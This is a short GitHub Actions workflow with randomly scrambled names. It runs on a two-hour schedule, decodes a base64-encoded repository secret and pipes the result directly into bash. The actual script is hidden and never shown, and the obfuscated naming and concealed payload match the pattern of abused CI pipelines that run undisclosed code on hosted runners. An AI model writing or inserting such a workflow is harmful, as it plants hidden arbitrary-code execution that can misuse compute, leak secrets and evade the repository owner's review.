name: MOHjwhaSfPaw
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  gpCqEMLBog:
    runs-on: ubuntu-latest
    env:
      eSxBpMwkvdS: ${{ secrets.jwXIeJvB }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.mskIZxigR }}" | base64 -d | bash
